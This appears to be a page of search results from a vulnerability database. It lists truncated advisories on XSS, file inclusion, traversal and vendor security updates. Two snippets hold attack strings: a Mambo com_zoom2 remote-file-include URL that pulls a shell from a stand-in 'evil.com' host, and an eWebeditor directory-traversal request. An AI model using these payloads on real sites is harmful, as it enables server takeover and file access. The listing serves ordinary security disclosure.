47153 matches found
Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities
a bug in Wordpress flash-album-gallery plugin that allows to us to occur a Cross-Site Scripting on a Remote machin. Islamic Republic Of Iran Security Team http://irist.ir/forum/ Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities Download......:...
APPLE-SA-2011-10-12-1 iOS 5 Software Update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-1 iOS 5 Software Update iOS 5 Software Update is now available and addresses the following: CalDAV Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch 3rd generation and later, iOS...
XSS и AoF уязвимости в Drupal
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting и Abuse of Functionality уязвимостях в Drupal. XSS WASC-08: При добавлении или изменении данных в любых внутренних формах добавление/изменение поста и т.д. можно провести persistent XSS атаку. XSS код выполнится при посещении...
VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability
VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...
HTB22970: Multiple XSS vulnerabilities in PHPDug
Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...
LFI in DZCP
Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status: Fixed by Vendor Risk level: High Credit: High-Tech...
Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances Advisory ID: cisco-sa-20100804-asa http://www.cisco.com/warp/public/707/cisco-sa-20100804-asa.shtml Revision 1.0 For Public Release 2010 August 04...
Microsoft Windows shortcuts code execution
Code execution on shortcut icon displaying...
eWebeditor Directory Traversal Vulnerability
Securitylab.ir Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./.. Discoverd By: Pouya Daneshmand Website: http://securitylab.ir Contacts:...
Oracle applications multiple security vulnerabilities
Oracle Critical Patch Update fixes 40 of different vulnerabilities in all Oracle applications...
[MORNINGSTAR-2009-02] Multiple security issues in Cute News and UTF-8 Cute News
MorningStar Security - Advisory http://www.morningstarsecurity.com/ Multiple security issues in Cute News and UTF-8 Cute News 1. Advisory Information ------------------------------------------------------------------------------------------------------------------------ Title: Multiple security...
US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...
[USN-649-1] OpenSSH vulnerabilities
=========================================================== Ubuntu Security Notice USN-649-1 October 01, 2008 openssh vulnerabilities CVE-2008-1657, CVE-2008-4109 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS...
Wordpress 2.5 Cookie Integrity Protection Vulnerability
Wordpress 2.5 Cookie Integrity Protection Vulnerability Original release date: 2008-04-25 Last revised: 2008-04-25 Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-integrity.txt CVE ID: CVE-2008-1930 Source: Steven J. Murdoch http://www.cl.cam.ac.uk/users/sjm217/...
[CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability
Title: CAID 35970: CA Products That Embed Ingres Authentication Vulnerability CA Vuln ID CAID: 35970 CA Advisory Date: 2007-12-19 Reported By: Ingres Corporation Impact: Attacker can gain elevated privileges. Summary: A potential vulnerability exists in the Ingres software that is embedded in...
ZDI-07-073: Microsoft Internet Explorer setExpression Vulnerability
ZDI-07-073: Microsoft Internet Explorer setExpression Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-073.html December 11, 2007 -- CVE ID: CVE-2007-3902 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 5.01 SP4 Internet Explorer 6 Internet...
[security bulletin] HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01188923 Version: 1 HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager OV NNM Remote Unauthorized Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should...
Liferay Enterprise Portal multiple XSS
Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...
Web Mayhem: Firefox’s JAR: Protocol issues
Web Mayhem: Firefox’s JAR: Protocol issues published: November 7th, 2007 One of the things that we enjoy the most, here in GNUCITIZEN, is finding issues with features. Unlike bugs, insecure features tend to be more severe and usually last longer due to uneasy and rather long decision making proce...
fusetalk SQL (autherror.cfm)
Hello everyone, After trying to report bugs to FuseTalk, and seeing them providing patches to customers dropping new fixed .cfm files in a private place reserved to customers without giving proper credits and without reporting them publicly we were following the Full Disclosure Policy v2.0, we...
Multiple Denial of Service attacks possible for Webspeed OpenEdge
Denial of Service attack against OpenEdge WebSpeed possible through dict.r. 11-5-2007 author: Eelko Neven discovered: 9-5-2007 Because of poor security in dict.r it is possible to put all agents in busy mode. First you have to find the messenger execution url. For example:...
[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability
comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
tar archiver directory traversal
Problem with outdated GNUTYPENAMES structure parsing allow to create symbolic links outside target directory...
LetterIt v2 (inc/session.php) Remote File Include Vulnerability
================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...
ExtCalThai_Component <= 0.9.1 Remote File Inclusion
ExtCalThaiComponent = 0.9.1 Remote File Inclusion Download Source : http://mamboxchange.com/frs/download.php/6004/ExtCalThaiComponentv0.9.1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; adminevents.php extcalendar.p mail.inc.phphp bugs ; at -...
7 php scripts File Inclusion / Source disclosure Vuln
Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...
OpenLDAP privilege escalation
User with 'selfwrite' ACL parameter can modify any attributes...
Code Injection in phpBB Advanced Quick Reply Mod
Software: phpBB Advanced Quick Reply Mod I've found a security hole in this sofware Code Injection. You can download this software at http://phpbbhacks.com/viewhack.php?id=586 Hackers can exploit this Mod to inject some shell code to hack your forum, your website or your server local exploit...
Vulnerability in AIX diagrpt
This file contains security alerts published by the IBM Emergency Response Service. These alerts are published at the following URL on the world-wide web: http://www.ers.ibm.com/ In order to keep the size of this file reasonable, it contains only advisories for the current year. You can obtain a...
StarOffice 5.1
Do you remember recent Microsoft Word and Wordpad vulnerabilities while reading .rtf documents? I realized that Sun StarOffice 5.1 is at least so buggy as M$ products. There are a lot of ways to cause overflow and crash or execution of arbitrary code while viewing documents - starting from html...
CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection
Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 = version 6.30.0 Affected JIRA product versions: 6.3.5 = version 6.4.11...
[SYSS-2015-018] BullGuard Premium Protection - Authentication Bypass
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-018 Product: BullGuard Premium Protection Vendor: BullGuard Ltd. Affected Versions: 15.0.297 Tested Versions: 15.0.297 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level: Medium...
APPLE-SA-2014-12-2-1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2014-12-3-1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1 is now available and addresses the following: WebKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite...
[USN-2383-1] wpa_supplicant vulnerability
========================================================================== Ubuntu Security Notice USN-2383-1 October 14, 2014 wpa, wpasupplicant vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...
APPLE-SA-2014-09-17-2 Apple TV 7
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-09-17-2 Apple TV 7 Apple TV 7 is now available and addresses the following: Apple TV Available for: Apple TV 3rd generation and later Impact: An attacker can obtain WiFi credentials Description: An attacker could have impersonated a WiFi...
[USN-2253-1] LibreOffice vulnerability
========================================================================== Ubuntu Security Notice USN-2253-1 June 23, 2014 libreoffice vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
[SECURITY] [DSA 2937-1] mod-wsgi security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2937-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq -...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities
Document Title: =============== Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1117 Release Date: ============= 2013-10-18 Vulnerability Laboratory ID VL-ID:...
[USN-1722-1] jQuery vulnerability
========================================================================== Ubuntu Security Notice USN-1722-1 February 13, 2013 jquery vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Adobe ColdFusion multiple security vulnerabilities
Authentication bypass, privilege escalation, information leakage...
Cross-Site Scripting (XSS) in Jease
Advisory ID: HTB23104 Product: Jease Vendor: jease.org Vulnerable Versions: 2.8 and probably prior Tested Version: 2.8 Vendor Notification: July 25, 2012 Public Disclosure: August 15, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-4052 CVSSv2 Base Score: 4.3...
Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access
OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is...
D-Link DIR-601 TFTP Directory Traversal Vulnerability
Vulnerability title: D-Link DIR-601 TFTP Directory Traversal Vulnerability CVSS Risk Rating: 7.8 High Product: D-Link DIR-601 Wireless N 150 Home Router Application Vendor: D-Link Vendor URL: www.dlink.com Public disclosure date: 1/20/2012 Discovered by: Rob Kraus and Solutionary Engineering...
[Announce] Apache HTTP Server 2.2.22 Released
Apache HTTP Server 2.2.22 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.22 of the Apache HTTP Server "Apache". This version of Apache is principally a security and bug fix release, including the following significant...
Multiple vulnerabilities in ImpressCMS
Vulnerability ID: HTB23064 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinimpresscms.html Product: ImpressCMS Vendor: The ImpressCMS Project http://www.impresscms.org/ Vulnerable Version: 1.3 Final and probably prior Tested Version: 1.3 Final Vendor Notification: 14 December...
[RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass
Advisory: Owl Intranet Engine: Authentication Bypass During a penetration test, RedTeam Pentesting discovered an Authentication Bypass vulnerability in the Owl Intranet Engine, which allows unauthenticated users administrative access to the affected systems. Details ======= Product: Owl Intranet...
TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181
TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 Published: 2011/11/16 Version 1.0 Affected products: iTop version 1.1.181, 1.2.0-RC-282 maybe earlier versions as well http://sourceforge.net/projects/itop/ References: CVE-2011-4275 - Multiple web-vulnerabilities in iTop...
Elastix PBX Extensions Enumeration
Exploit Title: Elastix PBX Extensions Enumeration Date: 1 Oct 2011 Author: Bassem Saleh Contact: Injectoratlivedotcom Software Link: http://www.elastix.org/ Version: 2.X and may be below versions Tested on: 2.0.3 ================================================================ Non privileges user...